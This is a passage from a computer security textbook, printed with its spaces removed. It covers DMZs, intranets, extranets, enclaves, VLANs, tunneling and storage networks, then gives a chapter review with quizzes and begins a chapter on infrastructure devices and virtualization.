servingcontenttoInternetusers,aswellasremoteaccessserversandexternale-mailservers.Ingeneral,anyserverdirectlyaccessedfromtheoutside,untrustedInternetzoneneedstobeintheDMZ.OtherserversshouldnotbeplacedintheDMZ.Domainnameserversforyourinner,
trustednetworkanddatabaseserversthathousecorporatedatabasesshouldnotbeaccessiblefromtheoutside.Applicationservers,fileservers,printservers—allofthestandardserversusedinthetrustednetwork—shouldbebehindbothfirewallsandtheroutersandswitchesusedtoconnectthesemachines.TheideabehindtheuseoftheDMZtopologyistoprovidepublicly
visibleserviceswithoutallowinguntrustedusersaccesstoyourinternalnetwork.Iftheoutsideusermakesarequestforaresourcefromthetrustednetwork,suchasadataelementfromaninternaldatabasethatisaccessedviaapubliclyvisiblewebpageintheDMZ,thenthisrequestneedstofollowthisscenario:
1.Auserfromtheuntrustednetwork(theInternet)requestsdataviaawebpagefromawebserverintheDMZ.
2.ThewebserverintheDMZrequeststhedatafromtheapplicationserver,whichcanbeintheDMZorintheinner,trustednetwork.
3.Theapplicationserverrequeststhedatafromthedatabaseserverinthetrustednetwork.
4.Thedatabaseserverreturnsthedatatotherequestingapplicationserver.
5.Theapplicationserverreturnsthedatatotherequestingwebserver.6.Thewebserverreturnsthedatatotherequestinguserfromthe
untrustednetwork.
ExamTip:DMZsactasabufferzonebetweenunprotectedareasofanetwork(theInternet)andprotectedareas(sensitivecompanydatastores),allowingforthemonitoringandregulationoftrafficbetweenthesetwozones.
Thisseparationaccomplishestwospecific,independenttasks.First,theuserisseparatedfromtherequestfordataonasecurenetwork.Byhaving
intermediariesdotherequesting,thislayeredapproachallowssignificantsecuritylevelstobeenforced.Usersdonothavedirectaccessorcontrolovertheirrequests,andthisfilteringprocesscanputcontrolsinplace.Second,scalabilityismoreeasilyrealized.Themultiple-serversolutioncanbemadetobeveryscalable,literallytomillionsofusers,withoutslowingdownanyparticularlayer.
InternetTheInternetisaworldwideconnectionofnetworksandisusedtotransporte-mail,files,financialrecords,remoteaccess—younameit—fromonenetworktoanother.TheInternetisnotasinglenetwork,butaseriesofinterconnectednetworksthatallowsprotocolstooperateandenabledatatoflowacrossit.Thismeansthatevenifyournetworkdoesn’thavedirectcontactwitharesource,aslongasaneighbor,oraneighbor’sneighbor,andsoon,cangetthere,socanyou.Thislargeweballowsusersalmostinfiniteabilitytocommunicatebetweensystems.
Thereareover3.2billionusersontheInternet,andEnglishisthemostusedlanguage.
Becauseeverythingandeveryonecanaccessthisinterconnectedwebanditisoutsideofyourcontrolandabilitytoenforcesecuritypolicies,theInternetshouldbeconsideredanuntrustednetwork.AfirewallshouldexistatanyconnectionbetweenyourtrustednetworkandtheInternet.ThisisnottoimplythattheInternetisabadthing—itisagreatresourceforallnetworksandaddssignificantfunctionalitytoourcomputingenvironments.ThetermWorldWideWeb(WWW)isfrequentlyusedsynonymously
torepresenttheInternet,buttheWWWisactuallyjustonesetofservicesavailableviatheInternet.WWWor“theWeb”ismorespecificallytheHypertextTransferProtocol(HTTP)–basedservicesthataremade
availableovertheInternet.Thiscanincludeavarietyofactualservicesandcontent,includingtextfiles,pictures,streamingaudioandvideo,andevenvirusesandworms.
IntranetAnintranetdescribesanetworkthathasthesamefunctionalityastheInternetforusersbutliescompletelyinsidethetrustedareaofanetworkandisunderthesecuritycontrolofthesystemandnetworkadministrators.Typicallyreferredtoascampusorcorporatenetworks,intranetsareusedeverydayincompaniesaroundtheworld.Anintranetallowsadeveloperandauserthefullsetofprotocols—HTTP,FTP,instantmessaging,andsoon—thatisofferedontheInternet,butwiththeaddedadvantageoftrustfromthenetworksecurity.ContentonintranetwebserversisnotavailableovertheInternettountrustedusers.Thislayerofsecurityoffersasignificantamountofcontrolandregulation,allowinguserstofulfillbusinessfunctionalitywhileensuringsecurity.Twomethodscanbeusedtomakeinformationavailabletooutside
users:DuplicationofinformationontomachinesintheDMZcanmakeitavailabletootherusers.Propersecuritychecksandcontrolsshouldbemadepriortoduplicatingthematerialtoensuresecuritypoliciesconcerningspecificdataavailabilityarebeingfollowed.Alternatively,extranets(discussedinthenextsection)canbeusedtopublishmaterialtotrustedpartners.
ExamTip:Anintranetisaprivate,internalnetworkthatusescommonnetworktechnologies(suchasHTTP,FTP,andsoon)toshareinformationandprovideresourcestoorganizationalusers.
ShouldusersinsidetheintranetrequireaccesstoinformationfromtheInternet,aproxyservercanbeusedtomasktherequestor’slocation.This
helpssecuretheintranetfromoutsidemappingofitsactualtopology.AllInternetrequestsgototheproxyserver.Ifarequestpassesfilteringrequirements,theproxyserver,assumingitisalsoacacheserver,looksinitslocalcacheofpreviouslydownloadedwebpages.Ifitfindsthepageinitscache,itreturnsthepagetotherequestorwithoutneedingtosendtherequesttotheInternet.Ifthepageisnotinthecache,theproxyserver,actingasaclientonbehalfoftheuser,usesoneofitsownIPaddressestorequestthepagefromtheInternet.Whenthepageisreturned,theproxyserverrelatesittotheoriginalrequestandforwardsitontotheuser.Thismaskstheuser’sIPaddressfromtheInternet.Proxyserverscanperformseveralfunctionsforafirm;forexample,theycanmonitortrafficrequests,eliminatingimproperrequestssuchasinappropriatecontentforwork.Theycanalsoactasacacheserver,cuttingdownonoutsidenetworkrequestsforthesameobject.Finally,proxyserversprotecttheidentityofinternalIPaddressesusingNAT,althoughthisfunctioncanalsobeaccomplishedthrougharouterorfirewallusingNATaswell.
ExtranetAnextranetisanextensionofaselectedportionofacompany’sintranettoexternalpartners.Thisallowsabusinesstoshareinformationwithcustomers,suppliers,partners,andothertrustedgroupswhileusingacommonsetofInternetprotocolstofacilitateoperations.Extranetscanusepublicnetworkstoextendtheirreachbeyondacompany’sowninternalnetwork,andsomeformofsecurity,typicallyVPN,isusedtosecurethischannel.Theuseofthetermextranetimpliesbothprivacyandsecurity.Privacyisrequiredformanycommunications,andsecurityisneededtopreventunauthorizeduseandeventsfromoccurring.Bothofthesefunctionscanbeachievedthroughtheuseoftechnologiesdescribedinthischapterandotherchaptersinthisbook.Properfirewallmanagement,remoteaccess,encryption,authentication,andsecuretunnelsacrosspublicnetworksareallmethodsusedtoensureprivacyandsecurityforextranets.
ExamTip:Anextranetisasemiprivatenetworkthatusescommonnetworktechnologies(suchasHTTP,FTP,andsoon)toshareinformationandprovideresourcestobusinesspartners.Extranetscanbeaccessedbymorethanonecompany,becausetheyshareinformationbetweenorganizations.
FlatNetworksAsnetworkshavebecomemorecomplex,withmultiplelayersoftiersandinterconnections,aproblemcanariseinconnectivity.OneofthelimitationsoftheSpanningTreeProtocol(STP)isitsinabilitytomanageLayer2trafficefficientlyacrosshighlycomplexnetworks.STPwascreatedtopreventloopsinLayer2networksandhasbeenimprovedtothecurrentversionofRapidSpanningTreeProtocol(RSTP).RSTPcreatesaspanningtreewithinthenetworkofLayer2switches,disablinglinksthatarenotpartofthespanningtree.RSTP,IEEE802.1w,providesamorerapidconvergencetoanewspanningtreesolutionaftertopologychangesaredetected.Theproblemwiththespanningtreealgorithmsisthatthenetworktrafficisinterruptedwhilethesystemrecalculatesandreconfigures.Thesedisruptionscancauseproblemsinnetworkefficienciesandhaveledtoapushforflatnetworkdesigns,whichavoidpacket-loopingissuesthroughanarchitecturethatdoesnothavetiers.Onenameassociatedwithflatnetworktopologiesisnetworkfabric,a
termmeanttodescribeaflat,depthlessnetwork.Thesearebecomingincreasinglypopularindatacenters,andotherareasofhightrafficdensity,astheycanofferincreasedthroughputandlowerlevelsofnetworkjitterandotherdisruptions.Whilethisisgoodforefficiencyofnetworkoperations,this“everyonecantalktoeveryone”ideaisproblematicwithrespecttosecurity.
Enclaves
Modernnetworks,withtheirincreasinglycomplexconnections,resultinsystemswherenavigationcanbecomecomplexbetweennodes.JustasaDMZ-basedarchitectureallowsfordifferinglevelsoftrust,theisolationofspecificpiecesofthenetworkusingsecurityrulescanprovidedifferingtrustenvironments.Theconceptofbreakinganetworkintoenclavescancreateareasoftrustwherespecialprotectionscanbeemployedandtrafficfromoutsidetheenclaveislimitedorproperlyscreenedbeforeadmission.Enclavesarenotdiametricallyopposedtotheconceptofaflatnetwork
structure;theyarejustcarved-outareas,likegatedneighborhoods,whereoneneedsspecialcredentialstoenter.Avarietyofsecuritymechanismscanbeemployedtocreateasecureenclave.Layer2addressing(subnetting)canbeemployed,makingdirectaddressabilityanissue.Firewalls,routers,andapplication-levelproxiescanbeemployedtoscreenpacketsbeforeentryorexitfromtheenclave.Eventhepeoplesideofthesystemcanberestrictedthroughtheuseofaspecialsetofsysadminstomanagethesystems.Enclavesareanimportanttoolinmodernsecurenetworkdesign.Figure
9.13showsanetworkdesignwithastandardtwo-firewallimplementationofaDMZ.Ontheinternalsideofthenetwork,multiplefirewallscanbeseen,carvingoffindividualsecurityenclaves,zoneswherethesamesecurityrulesapply.Commonenclavesincludethoseforhigh-securitydatabases,low-securityusers(callcenters),public-facingkiosks,andthemanagementinterfacestoserversandnetworkdevices.Havingeachoftheseinitsownzoneprovidesformoresecuritycontrol.Onthemanagementlayer,usinganonroutableIPaddressschemeforalloftheinterfacespreventsthemfrombeingdirectlyaccessedfromtheInternet.
•Figure9.13Secureenclaves
VLANsALANisasetofdeviceswithsimilarfunctionalityandsimilarcommunicationneeds,typicallyco-locatedandoperatedoffasingleswitch.Thisisthelowestlevelofanetworkhierarchyanddefinesthedomainforcertainprotocolsatthedatalinklayerforcommunication.AvirtualLAN(VLAN)isalogicalimplementationofaLANandallowscomputersconnectedtodifferentphysicalnetworkstoactandcommunicateasiftheywereonthesamephysicalnetwork.AVLANhasmanyofthesamecharacteristicattributesofaLANandbehavesmuchlikeaphysicalLANbutisimplementedusingswitchesandsoftware.Thisverypowerfultechniqueallowssignificantnetworkflexibility,scalability,andperformanceandallowsadministratorstoperformnetworkreconfigurationswithouthavingtophysicallyrelocateorrecablesystems.
ExamTip:Abroadcastdomainisalogicaldivisionofacomputernetwork.Systemsconnectedtoabroadcastdomaincancommunicatewitheachotherasiftheywereconnectedtothesamephysicalnetworkevenwhentheyarenot.
TrunkingTrunkingistheprocessofspanningasingleVLANacrossmultipleswitches.Atrunk-basedconnectionbetweenswitchesallowspacketsfromasingleVLANtotravelbetweenswitches,asshowninFigure9.14.Twotrunksareshowninthefigure:VLAN10isimplementedwithonetrunkandVLAN20isimplementedwiththeother.HostsondifferentVLANscannotcommunicateusingtrunksandthusareswitchedacrosstheswitchnetwork.TrunksenablenetworkadministratorstosetupVLANsacrossmultipleswitcheswithminimaleffort.WithacombinationoftrunksandVLANs,networkadministratorscansubnetanetworkbyuserfunctionalitywithoutregardtohostlocationonthenetworkortheneedtorecablemachines.
•Figure9.14VLANsandtrunks
SecurityImplicationsVLANsareusedtodivideasinglenetworkintomultiplesubnetsbasedonfunctionality.Thispermitsaccountingandmarketing,forexample,toshareaswitchbecauseofproximityyetstillhaveseparatetrafficdomains.Thephysicalplacementofequipmentandcablesislogicallyandprogrammaticallyseparatedsothatadjacentportsonaswitchcanreferenceseparatesubnets.Thispreventsunauthorizeduseofphysically
closedevicesthroughseparatesubnetsthatareonthesameequipment.VLANsalsoallowanetworkadministratortodefineaVLANthathasnousersandmapalloftheunusedportstothisVLAN(somemanagedswitchesallowadministratorstosimplydisableunusedportsaswell).Then,ifanunauthorizedusershouldgainaccesstotheequipment,thatuserwillbeunabletouseunusedports,asthoseportswillbesecurelydefinedtonothing.BothapurposeandasecuritystrengthofVLANsisthatsystemsonseparateVLANscannotdirectlycommunicatewitheachother.
TrunksandVLANshavesecurityimplicationsthatyouneedtoheedsothatfirewallsandothersegmentationdevicesarenotbreachedthroughtheiruse.YoualsoneedtounderstandhowtousetrunksandVLANs,topreventanunauthorizeduserfromreconfiguringthemtogainundetectedaccesstosecureportionsofanetwork.
ZonesandConduitsThetermszonesandconduitshavespecializedmeaningincontrolsystemnetworks.Controlsystemsarethecomputersusedtocontrolphysicalprocesses,rangingfromtrafficlightstorefineries,manufacturingplants,criticalinfrastructure,andmore.ThesenetworksarenowbeingattachedtoenterprisenetworksandthiswillresultintheinclusionofcontrolsystemnetworkterminologyintoIT/network/securityoperationsterminology.Atermcommonlyusedincontrolsystemnetworksiszone.Azoneisagroupingofelementsthatsharecommonsecurityrequirements.Aconduitisdefinedasthepathfortheflowofdatabetweenzones.Zonesaresimilartoenclavesinthattheyhaveadefinedsetofcommon
securityrequirementsthatdifferfromoutsidethezone.Thezoneismarkedonadiagram,indicatingtheboundarybetweenwhatisinandoutsidethezone.Alldataflowsinoroutofazonemustbebyadefinedconduit.Theconduitallowsameanstofocusthesecurityfunctiononthe
dataflows,ensuringtheappropriateconditionsaremetbeforedataentersorleavesazone.
TunnelingTunnelingisamethodofpackagingpacketssothattheycantraverseanetworkinasecure,confidentialmanner.Tunnelinginvolvesencapsulatingpacketswithinpackets,enablingdissimilarprotocolstocoexistinasinglecommunicationstream,asinIPtrafficroutedoveranAsynchronousTransferMode(ATM)network.Tunnelingalsocanprovidesignificantmeasuresofsecurityandconfidentialitythroughencryptionandencapsulationmethods.ThebestexampleofthisisaVPNthatisestablishedoverapublicnetworkthroughtheuseofatunnel,asshowninFigure9.15,connectingafirm’sBostonofficetoitsNewYorkCity(NYC)office.
•Figure9.15Tunnelingacrossapublicnetwork
Assume,forexample,thatacompanyhasmultiplelocationsanddecidestousethepublicInternettoconnectthenetworksattheselocations.Tomaketheseconnectionssecurefromoutsideunauthorizeduse,thecompanycanemployaVPNconnectionbetweenthedifferentnetworks.Oneachnetwork,anedgedevice,usuallyarouterorVPNconcentrator,connectstoanotheredgedeviceontheothernetwork.Then,usingIPsecprotocols,theseroutersestablishasecure,encryptedpathbetweenthem.
Thissecurelyencryptedsetofpacketscannotbereadbyoutsiderouters;onlytheaddressesoftheedgeroutersarevisible.ThisarrangementactsasatunnelacrossthepublicInternetandestablishesaprivateconnection,securefromoutsidesnoopingoruse.Becauseofeaseofuse,low-costhardware,andstrongsecurity,tunnels
andtheInternetareacombinationthatwillseemoreuseinthefuture.IPsec,VPN,andtunnelswillbecomeamajorsetoftoolsforusersrequiringsecurenetworkconnectionsacrosspublicsegmentsofnetworks.FormoreinformationonVPNsandremoteaccess,refertoChapter11.
AVPNconcentratorisaspecializedpieceofhardwaredesignedtohandletheencryptionanddecryptionrequiredforremote,secureaccesstoanorganization’snetwork.
StorageAreaNetworksStorageareanetworks(SANs)aresystemswhichprovideremotestorageofdataacrossanetworkconnection.ThedesignofSANprotocolsissuchthatthediskappearstoactuallybeontheclientmachineasalocaldriveratherthanasattachedstorage,asinnetworkattachedstorage(NAS).Thismakesthediskvisibleindiskandvolumemanagementutilitiesandallowstheirfunctionality.CommonSANprotocolsincludeiSCSIandFibreChannel.
iSCSITheInternetSmallComputerSystemInterface(iSCSI)isaprotocolforIP-basedstorage.iSCSIcanbeusedtosenddataoverexistingnetworkinfrastructures,enablingSANs.Positionedasalow-costalternativetoFibreChannelstorage,theonlyreallimitationisoneofnetworkbandwidth.
FibreChannelFibreChannel(FC)isahigh-speednetworktechnology(withthroughputupto16Gbps)usedtoconnectstoragetocomputersystems.TheFCprotocolisatransportprotocolsimilartotheTCPprotocolinIPnetworks.Carriedviaspecialcables,oneofthedrawbacksofFC-basedstorageiscost.
FCoETheFibreChanneloverEthernet(FCoE)protocolencapsulatestheFCframes,enablingFCcommunicationover10-GigabitEthernetnetworks.
Chapter9Review
ForMoreInformationNetworkingCompTIANetwork+CertificationAll-in-OneExamGuide,PremiumFifthEdition,McGraw-Hill,2014
TheInternetEngineeringTaskForcewww.ietf.org
Wikipediaarticles:Routinghttp://en.wikipedia.org/wiki/RoutingNAThttp://en.wikipedia.org/wiki/Network_address_translationICMPhttp://en.wikipedia.org/wiki/Internet_Control_Message_Protocol
Subnettinghttp://en.wikipedia.org/wiki/Subnetting
LabManualExercisesThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providepracticalapplicationofmaterialcoveredinthischapter:
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutnetworks.
Identifythebasicnetworkarchitectures
Therearetwobroadcategoriesofnetworks:LANsandWANs.
Thephysicalarrangementofanetworkistypicallycalledthenetwork’stopology.
Therearefourmaintypesofnetworktopologies:ring,bus,star,andmixed.
Definethebasicnetworkprotocols
Protocols,agreed-uponformatsforexchangingortransmittingdatabetweensystems,enablecomputerstocommunicate.
Whendataistransmittedoveranetwork,itisusuallybrokenupintosmallerpiecescalledpackets.
Mostprotocolsdefinethetypesandformatforpacketsusedinthatprotocol.
TCPisconnectionoriented,requiresthethree-wayhandshaketoinitiateaconnection,andprovidesguaranteedandreliabledatadelivery.
UDPisconnectionless,lightweight,andprovideslimitederrorcheckingandnodeliveryguarantee.
EachnetworkdevicehasauniquehardwareaddressknownasaMACaddress.TheMACaddressisusedforpacketdelivery.
Networkdevicesarealsotypicallyassigneda32-bitnumberknownasanIPaddress.
TheDomainNameService(DNS)translatesnames,likewww.cnn.com,intoIPaddresses.
Explainroutingandaddresstranslation
Theprocessofmovingpacketsfromoneenddevicetoanotherthroughdifferentnetworksiscalledrouting.
Subnettingistheprocessofdividinganetworkaddressspaceintosmallernetworks.
DHCPallowsnetworkdevicestobeautomaticallyconfiguredonanetworkandtemporarilyassignedanIPaddress.
NetworkAddressTranslation(NAT)convertsprivate,internalIPaddressestopublic,routableIPaddressesandviceversa.
Classifysecurityzones
ADMZisabufferzonebetweennetworkswithdifferenttrustlevels.CompaniesoftenplacepublicresourcesinaDMZsothatInternetusersandinternalusersmayaccessthoseresourceswithoutexposingtheinternalcompanynetworktotheInternet.
Anintranetisaprivate,internalnetworkthatusescommonnetworktechnologies(suchasHTTP,FTP,andsoon)toshareinformationandprovideresourcestoorganizationalusers.
Anextranetisasemiprivatenetworkthatusescommonnetworktechnologies(suchasHTTP,FTP,andsoon)toshareinformationandprovideresourcestobusinesspartners.
Anenclaveisaspecializedsecurityzonewithcommonsecurityrequirements.
AVLAN(orvirtualLAN)isagroupofportsonaswitchthatisconfiguredtocreatealogicalnetworkofcomputerthatappearstobeconnectedtothesamenetworkeveniftheyarelocatedondifferentphysicalnetworksegments.SystemsonaVLANcancommunicatewitheachotherbutcannotcommunicatedirectlywithsystemsonotherVLANs.
TrunkingistheprocessofspanningasingleVLANacrossmultipleswitches.
Tunnelingisamethodofpackagingpacketssothattheycantraverseanetworkinasecure,confidentialmanner.
KeyTermsAddressResolutionProtocol(ARP)(234)bustopology(222)datagram(226)denial-of-service(DoS)(229)
DomainNameSystem(DNS)(235)DMZ(240)DynamicHostConfigurationProtocol(DHCP)(238)enclave(243)Ethernet(233)extranet(243)flatnetwork(243)InternetControlMessageProtocol(ICMP)(229)InternetProtocol(IP)(226)intranet(242)localareanetwork(LAN)(221)MediaAccessControl(MAC)address(233)NetworkAddressTranslation(NAT)(238)network(220)packet(225)protocol(223)ringtopology(222)routing(235)startopology(222)storageareanetwork(SAN)(221)subnetting(236)subnetmask(236)three-wayhandshake(228)topology(222)TransmissionControlProtocol(TCP)(228)trunking(245)tunneling(246)UserDatagramProtocol(UDP)(228)virtuallocalareanetwork(VLAN)(222)wideareanetwork(WAN)(221)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.A(n)_______________isagroupoftwoormoredeviceslinkedtogethertosharedata.
2.ApacketinanIPnetworkissometimescalleda(n)_______________.
3.Movingpacketsfromsourcetodestinationacrossmultiplenetworksiscalled____________.
4.The_______________isthehardwareaddressusedtouniquelyidentifyeachdeviceonanetwork.
5.A(n)_______________tellsyouwhatportionofa32-bitIPaddressisbeingusedasthenetworkIDandwhatportionisbeingusedasthehostID.
6.Theshapeorarrangementofanetwork,suchasbus,star,ring,ormixed,isknownasthe_______________ofthenetwork.
7.Asmall,typicallylocalnetworkcoveringarelativelysmallareasuchasasinglefloorofanofficebuildingiscalleda(n)_______________.
8.A(n)_______________isanagreed-uponformatforexchanginginformationbetweensystems.
9.Thepacketexchangesequence(SYN,SYN/ACK,ACK)thatinitiatesaTCPconnectioniscalledthe_______________.
10._______________istheprotocolthatallowstheuseofprivate,internalIPaddressesforinternaltrafficandpublicIPaddressesforexternaltraffic.
Multiple-ChoiceQuiz1.WhatisLayer1oftheOSImodelcalled?
A.Thephysicallayer
B.Thenetworklayer
C.Theinitiallayer
D.Thepresentationlayer
2.TheUDPprotocol:A.Providesexcellenterror-checkingalgorithms
B.Isaconnectionlessprotocol
C.Guaranteesdeliveryofpackets
D.Requiresapermanentconnectionbetweensourceanddestination
3.TheprocessthatdynamicallyassignsanIPaddresstoanetworkdeviceiscalled:
A.NAT
B.DNS
C.DHCP
D.Routing
4.Whatisthethree-wayhandshakesequenceusedtoinitiateTCPconnections?
A.ACK,SYN/ACK,ACK
B.SYN,SYN/ACK,ACK
C.SYN,SYN,ACK/ACK
D.ACK,SYN/ACK,SYN
5.Whichofthefollowingisacontrolandinformationprotocolusedbynetworkdevicestodeterminesuchthingsasaremotenetwork’savailabilityandthelengthoftimerequiredtoreacharemotenetwork?
A.UDP
B.NAT
C.TCP
D.ICMP
6.WhatisthenameoftheprotocolthattranslatesnamesintoIPaddresses?
A.TCP
B.DNS
C.ICMP
D.DHCP
7.Dividinganetworkaddressspaceintosmaller,separatenetworksiscalledwhat?
A.Translating
B.Networkconfiguration
C.Subnetting
D.Addresstranslation
8.Whichprotocoltranslatesprivate(nonroutable)IPaddressesintopublic(routable)IPaddresses?
A.NAT
B.DHCP
C.DNS
D.ICMP
9.TheTCPprotocol:A.Isconnectionless
B.Providesnoerrorchecking
C.Allowsforpacketstobeprocessedintheordertheyweresent
D.Hasnooverhead
10.WhichofthefollowingwouldbeavalidMACaddress?A.00:07:e9
B.00:07:e9:7c:c8
C.00:07:e9:7c:c8:aa
D.00:07:e9:7c:c8:aa:ba
EssayQuiz1.Adeveloperinyourcompanyisbuildinganewapplicationandhas
askedyouifitshoulduseTCP-orUDP-basedcommunications.Provideherwithabriefdiscussionoftheadvantagesanddisadvantagesofeachprotocol.
2.YourbosswantstoknowifDHCPisappropriateforbothserverandPCenvironments.ProvideherwithyouropinionandbesuretoincludeadiscussionofhowDHCPworks.
3.Describethethreebasictypesofnetworktopologiesandprovideasamplediagramofeachtype.
4.Describethethree-wayhandshakeprocessusedtoinitiateTCP
connections.
5.Yourbosswantstoknowhowsubnettingworks.Provideherwithabriefdescriptionandbesuretoincludeanexampletoillustratehowsubnettingworks.
LabProjects
•LabProject9.1Aclientofyoursonlyhasfiveexternal,routableIPaddressesbuthasover50systemsthatitwantstobeabletoreachtheInternetforwebsurfing,e-mail,andsoon.Designanetworksolutionfortheclientthataddressestheirimmediateneedsbutwillstillletthemgrowinthefuture.
•LabProject9.2Yourbosswantsyoutolearnhowtousethearpandnslookupcommands.FindaWindowsmachineandopenacommand/DOSprompt.TypeinarpandpressENTERtoseetheoptionsforthearpcommand.UsethearpcommandtofindtheMACaddressofyoursystemandatleastfiveothersystemsonyournetwork.Whenyouarefinishedwitharp,typeinnslookupandpressENTER.Attheprompt,typeinthenameofyourfavoritewebsite,suchaswww.cnn.com.ThenslookupcommandwillreturntheIPaddressesthatmatchthatdomainname.FindtheIPaddressesofatleastfivedifferentwebsites.
chapter10 InfrastructureSecurity
Thehigheryourstructureistobe,thedeepermustbeitsfoundation.
—SAINTAUGUSTINE
I
Inthischapter,youwilllearnhowto
Constructnetworksusingdifferenttypesofnetworkdevices
Enhancesecurityusingsecuritydevices
EnhancesecurityusingNAC/NAPmethodologies
Identifythedifferenttypesofmediausedtocarrynetworksignals
Describethedifferenttypesofstoragemediausedtostoreinformation
Usebasicterminologyassociatedwithnetworkfunctionsrelatedtoinformationsecurity
Describethedifferenttypesandusesofcloudcomputing
nfrastructuresecuritybeginswiththedesignoftheinfrastructureitself.Theproperuseofcomponentsimprovesnotonlyperformancebutsecurityaswell.Networkcomponentsarenotisolatedfromthe
computingenvironmentandareanessentialaspectofatotalcomputingenvironment.Fromtherouters,switches,andcablesthatconnectthedevices,tothefirewallsandgatewaysthatmanagecommunication,fromthenetworkdesign,totheprotocolsthatareemployed—alltheseitemsplayessentialrolesinbothperformanceandsecurity.
DevicesAcompletenetworkcomputersolutionintoday’sbusinessenvironmentconsistsofmorethanjustclientcomputersandservers.Devicesareneededtoconnecttheclientsandserversandtoregulatethetrafficbetweenthem.Devicesarealsoneededtoexpandthisnetworkbeyondsimpleclientcomputersandserverstoincludeyetotherdevices,suchaswirelessandhandheldsystems.Devicescomeinmanyformsandwithmanyfunctions,fromhubsandswitches,torouters,wirelessaccesspoints,andspecial-purposedevicessuchasvirtualprivatenetwork(VPN)devices.Eachdevicehasaspecificnetworkfunctionandplaysaroleinmaintaining
networkinfrastructuresecurity.
CrossCheckTheImportanceofAvailabilityInChapter2,weexaminedtheCIAofsecurity:confidentiality,integrity,andavailability.Unfortunately,theavailabilitycomponentisoftenoverlooked,eventhoughavailabilityiswhathasmovedcomputingintothemodernnetworkedframeworkandplaysasignificantroleinsecurity.Securityfailurescanoccurintwoways.First,afailurecanallowunauthorizedusersaccessto
resourcesanddatatheyarenotauthorizedtouse,compromisinginformationsecurity.Second,afailurecanpreventauserfromaccessingresourcesanddatatheuserisauthorizedtouse.Thissecondfailureisoftenoverlooked,butitcanbeasseriousasthefirst.Theprimarygoalofnetworkinfrastructuresecurityistoallowallauthorizeduseanddenyallunauthorizeduseofresources.
WorkstationsMostusersarefamiliarwiththeclientcomputersusedintheclient/servermodelcalledworkstationdevices.Theworkstationisthemachinethatsitsonthedesktopandisusedeverydayforsendingandreadinge-mail,creatingspreadsheets,writingreportsinawordprocessingprogram,andplayinggames.Ifaworkstationisconnectedtoanetwork,itisanimportantpartofthesecuritysolutionforthenetwork.Manythreatstoinformationsecuritycanstartataworkstation,butmuchcanbedoneinafewsimplestepstoprovideprotectionfrommanyofthesethreats.
CrossCheckWorkstationsandServersServersandworkstationsarekeynodesonnetworks.ThespecificsforsecuringthesedevicesarescoveredinChapter14.
ServersServersarethecomputersinanetworkthathostapplicationsanddataforeveryonetoshare.Serverscomeinmanysizes,fromsmallsingle-CPUboxesthatmaybelesspowerfulthanaworkstation,tomultiple-CPUmonsters,uptoandincludingmainframes.TheoperatingsystemsusedbyserversrangefromWindowsServer,toUNIX,toMultipleVirtualStorage(MVS)andothermainframeoperatingsystems.TheOSonaservertendstobemorerobustthantheOSonaworkstationsystemandisdesignedtoservicemultipleusersoveranetworkatthesametime.Serverscanhostavarietyofapplications,includingwebservers,databases,e-mailservers,fileservers,printservers,andapplicationserversformiddlewareapplications.
VirtualizationVirtualizationtechnologyisusedtoallowacomputertohavemorethanoneOSpresentand,inmanycases,operatingatthesametime.VirtualizationisanabstractionoftheOSlayer,creatingtheabilitytohostmultipleOSsonasinglepieceofhardware.Oneofthemajoradvantagesofvirtualizationistheseparationofthesoftwareandthehardware,creatingabarrierthatcanimprovemanysystemfunctions,includingsecurity.Theunderlyinghardwareisreferredtoasthehostmachine,andonitisahostOS.EitherthehostOShasbuilt-inhypervisorcapabilityoranapplicationisneededtoprovidethehypervisorfunctiontomanagethevirtualmachines(VMs).ThevirtualmachinesaretypicallyreferredtoastheguestOSs.
ExamTip:Ahypervisoristheinterfacebetweenavirtualmachineandthehostmachinehardware.Hypervisorsarethelayerthatenablesvirtualization.
NewerOSsaredesignedtonativelyincorporatevirtualizationhooks,enablingvirtualmachinestobeemployedwithgreaterease.Thereareseveralcommonvirtualizationsolutions,includingMicrosoftHyper-V,VMware,OracleVMVirtualBox,Parallels,andCitrixXen.ItisimportanttodistinguishbetweenvirtualizationandbootloadersthatallowdifferentOSstobootonhardware.Apple’sBootCampallowsyoutobootintoMicrosoftWindowsonApplehardware.ThisisdifferentfromParallels,aproductwithcompletevirtualizationcapabilityforApplehardware.Virtualizationoffersmuchintermsofhost-basedmanagementofa
system.Fromsnapshotsthatalloweasyrollbacktopreviousstates,fastersystemdeploymentviapreconfiguredimages,easeofbackup,andtheabilitytotestsystems,virtualizationoffersmanyadvantagestosystemowners.Theseparationoftheoperationalsoftwarelayerfromthehardwarelayercanoffermanyimprovementsinthemanagementofsystems.
SnapshotsAsnapshotisapoint-in-timesavingofthestateofavirtualmachine.Snapshotshavegreatutilitybecausetheyarelikeasavepointforanentiresystem.Snapshotscanbeusedtorollasystembacktoapreviouspointintime,undooperations,orprovideaquickmeansofrecoveryfromacomplex,system-alteringchangethathasgoneawry.Snapshotsactasaformofbackupandaretypicallymuchfasterthannormalsystembackupandrecoveryoperations.
PatchCompatibilityHavinganOSoperateinavirtualenvironmentdoesnotchangetheneedforsecurityassociatedwiththeOS.Patchesarestillneededandshouldbeapplied,independentofthevirtualizationstatus.Becauseofthenatureofavirtualenvironment,itshouldhavenoeffectontheutilityofpatching,asthepatchisfortheguestOS.
HostAvailability/ElasticityWhenyousetupavirtualizationenvironment,protectingthehostOSandhypervisorleveliscriticalforsystemstability.Thebestpracticeistoavoidtheinstallationofanyapplicationsonthehost-levelmachine.Allappsshouldbehousedandruninavirtualenvironment.ThisaidsinthestabilitybyprovidingseparationbetweentheapplicationandthehostOS.Thetermelasticityreferstotheabilityofasystemtoexpand/contractassystemrequirementsdictate.Oneoftheadvantagesofvirtualizationisthatavirtualmachinecanbemovedtolargerorsmallerenvironmentsbasedonneeds.IfaVMneedsmoreprocessingpower,thenmigratingtheVMtoanewhardwaresystemwithgreaterCPUcapacityallowsthesystemtoexpandwithouthavingtorebuildit.
